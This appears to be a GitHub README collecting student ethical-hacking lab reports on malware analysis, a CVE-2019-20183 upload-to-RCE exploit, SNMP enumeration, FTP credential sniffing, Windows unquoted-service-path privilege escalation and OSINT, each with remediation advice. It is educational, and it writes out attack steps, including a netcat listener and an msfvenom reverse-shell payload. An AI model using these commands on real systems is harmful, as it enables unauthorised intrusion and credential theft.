cyr6x/ethical-hacking-lab-reports
GitHub: cyr6x/ethical-hacking-lab-reports
一套覆盖 CVE 利用、恶意软件分析、OSINT 侦察、SNMP 枚举、FTP 取证和 Windows 提权等主题的道德黑客实操实验报告合集,附有详细操作步骤与修复建议。
Stars: 0 | Forks: 0
# 道德黑客与信息安全实验报告




作为**计算与网络安全 5 级文凭**(NCC Education)课程的一部分,完成的一系列关于道德黑客和信息安全评估的实操实验报告合集。每个实验均在**隔离的、经授权的学术环境**中进行。
## 实验索引
| # | 实验 | 关键技术 | 使用工具 |
|---|-----|---------------|------------|
| 01 | [恶意软件分析](#01-malware-analysis) | 静态与动态分析,IOC 提取 | Ghidra, Cuckoo Sandbox, Volatility, FTK Imager |
| 02 | [CVE-2019-20183 漏洞利用](#02-cve-2019-20183--unrestricted-file-upload--rce) | 文件上传绕过,RCE,CVSS 评分 | Burp Suite, msfvenom, Netcat |
| 03 | [SNMP 枚举](#03-snmp-enumeration-port-161) | 服务枚举,MIB walking | Nmap, onesixtyone, snmpwalk |
| 04 | [FTP 取证与数据包分析](#04-ftp-forensics--packet-analysis) | 凭证捕获,协议分析 | Wireshark, tcpdump |
| 05 | [Unquoted Service Path 提权](#05-unquoted-service-path-privilege-escalation) | Windows 提权,服务漏洞利用 | WMIC, msfvenom, accesschk |
| 06 | [OSINT 与信息收集](#06-osint--footprinting) | 被动侦察,元数据提取 | theHarvester, Shodan, Maltego, FOCA |
## 01. 恶意软件分析
**目标:** 对恶意软件样本执行静态和动态分析,以识别其行为、持久化机制和失陷指标 (IOC)。
**技术:**
- 静态分析:字符串提取、PE 头检查、哈希识别
- 动态分析:沙箱执行、网络流量监控、注册表监控
- 内存取证:进程注入识别
**工具:** `Ghidra` `Cuckoo Sandbox` `Volatility` `FTK Imager` `VirusTotal`
**关键发现:**
- 识别出通过 DNS 查询向硬编码 IP 进行的 C2 回连行为
- 检测到注册表持久化键:`HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
- 提取了网络 IOC:端口 4444 上的可疑出站连接
**Security+ 映射:** 领域 2 — 威胁情报与恶意软件类型
## 02. CVE-2019-20183 — 无限制文件上传与 RCE
**CVE:** CVE-2019-20183 | **CVSS v3.1:** 7.2 (高危) | **系统:** Employee Records System 1.0
**漏洞:** `uploadimage.php` 中仅存在客户端文件扩展名验证。服务器不执行 MIME 类型检查,允许上传任意的 PHP webshell。
**利用步骤:**
```
1. Intercept upload request with Burp Suite
2. Modify Content-Type header to bypass client-side JS validation
3. Upload PHP reverse shell with allowed extension
4. Navigate to upload directory to trigger execution
5. Catch reverse shell: nc -lvnp 4444
```
**修复建议:**
- 为文件扩展名实施服务器端白名单
- 将上传文件存储在 Web 根目录之外,并使用随机化文件名
- 在服务器端添加 MIME 类型验证
- 打补丁后重新测试以确认修复
**Security+ 映射:** 领域 2 — 漏洞与应用程序安全
## 03. SNMP 枚举 (端口 161)
**目标:** 枚举启用了 SNMP 的设备,以提取系统信息、运行进程和网络配置。
**技术:**
- SNMP v1/v2c 团体字符串爆破
- MIB (管理信息库) walking
- 通过 SNMP 发现网络拓扑
**使用的命令:**
```
# 发现 SNMP 主机
nmap -sU -p 161 --open 192.168.1.0/24
# 暴力破解 community strings
onesixtyone -c community_strings.txt 192.168.1.x
# 遍历 MIB 树
snmpwalk -v2c -c public 192.168.1.x
```
**关键发现:**
- 默认团体字符串 `public` 暴露了完整的系统 MIB
- 成功提取了运行进程、已安装软件和路由表
- SNMP v1/v2c 没有身份验证或加密
**修复建议:** 升级到具有 AuthPriv 模式的 SNMPv3;将 SNMP 访问限制在管理 VLAN 内
**Security+ 映射:** 领域 3 — 网络安全与枚举
## 04. FTP 取证与数据包分析
**目标:** 捕获并分析 FTP 流量,以证明凭证的暴露风险并提出安全的替代方案。
**技术:**
- 对 FTP 会话进行数据包捕获 (端口 21)
- 从明文流量中提取凭证
- 协议比较:FTP vs FTPS vs SFTP
**使用的命令:**
```
# 捕获 FTP 流量
tcpdump -i eth0 port 21 -w ftp_capture.pcap
# 在 Wireshark 中过滤
ftp.request.command == "USER" || ftp.request.command == "PASS"
```
**关键发现:**
- 用户名和密码以明文形式传输,在不到 3 秒内即被捕获
- 目录结构和文件名在数据包流中完全可见
- 在 FTP 会话的任何阶段都没有加密
**修复建议:** 用 SFTP (端口 22) 或 FTPS (端口 990) 替换 FTP;强制使用基于密钥的身份验证
**Security+ 映射:** 领域 3 — 协议安全与网络分析
## 05. Unquoted Service Path 提权
**目标:** 利用 Windows 系统上的 Unquoted Service Path 漏洞,将标准用户的权限提升至 SYSTEM。
**漏洞:** 包含空格且不带引号的 Windows 服务二进制路径,允许攻击者在更早的路径段中放置恶意可执行文件。
**利用步骤:**
```
1. Enumerate vulnerable services
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"
2. Verify write permissions on vulnerable path
accesschk.exe -wvu "C:\Program Files\Vulnerable App"
3. Place malicious payload at exploitable path
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe > payload.exe
4. Restart service and catch SYSTEM shell
```
**关键发现:**
- 从标准用户账户实现了 SYSTEM 级别的访问权限
- 服务重启触发了 payload 执行,无需用户交互
- 漏洞的存在是由于服务配置中不正确的路径引用
**修复建议:** 将所有服务二进制路径用引号括起来;对服务账户应用最小权限原则
**Security+ 映射:** 领域 2 — 漏洞利用与 Windows 安全
## 06. OSINT 与信息收集
**目标:** 对目标组织进行被动侦察,在不进行直接交互的情况下映射其攻击面。
**技术:**
- 电子邮件收集与员工枚举
- DNS 和子域枚举
- 从公开文档中提取元数据
- Shodan IoT/设备发现
**工具与命令:**
```
# Email 和子域名收集
theHarvester -d target.com -b google,linkedin,bing
# Shodan 设备发现
shodan search org:"Target Organisation"
# DNS 枚举
nslookup -type=ANY target.com
```
**关键发现:**
- 从公共来源收集了 14 个员工电子邮件地址
- 识别出 3 个暴露的子域,其中包括一个 staging 环境
- PDF 元数据揭示了内部用户名和软件版本
- Shodan 识别出 2 台面向互联网且使用默认凭证的设备
**修复建议:** 剥离公开文档中的元数据;禁用不必要的子域;更改默认凭证;实施电子邮件地址混淆
**Security+ 映射:** 领域 2 — 威胁情报、OSINT 与侦察
## 展示技能
| 类别 | 技能 |
|----------|--------|
| 进攻性安全 | CVE 利用、权限提升、Web 应用攻击、社会工程学侦察 |
| 网络分析 | 数据包捕获、协议分析、流量过滤、凭证提取 |
| OSINT | 被动侦察、元数据分析、电子邮件收集、攻击面映射 |
| 恶意软件分析 | 静态/动态分析、IOC 提取、内存取证、沙箱分析 |
| 修复建议 | 安全控制、补丁管理、加固建议 |
## 环境与道德
## 相关代码库
- [网络安全防御](https://github.com/Cyril556/network-security-defence) — LAN 设计,DMZ 架构,DDoS 缓解
- [CCorp SIRTS](https://github.com/Cyril556/ccorp-sirts) — 安全事件响应与工单系统
- [SY0-701 考试模拟器](https://github.com/Cyril556/sy0-701-simulator) — CompTIA Security+ 练习平台
标签:Burp Suite, CTI, Cuckoo Sandbox, CVE漏洞利用, CVSS评分, DAST, ESC4, FTP取证, Ghidra, Go语言工具, IP 地址批量处理, Level 5 Diploma, meg, NCC Education, Nmap, OSINT, RCE, SNMP枚举, Windows提权, Wireshark, 云安全监控, 信息安全, 协议分析, 句柄查看, 安全实训, 安全实验报告, 实时处理, 恶意软件分析, 插件系统, 无线安全, 权限提升, 编程工具, 网络安全, 网络靶场, 虚拟驱动器, 远程代码执行, 防御绕过, 隐私保护, 静态分析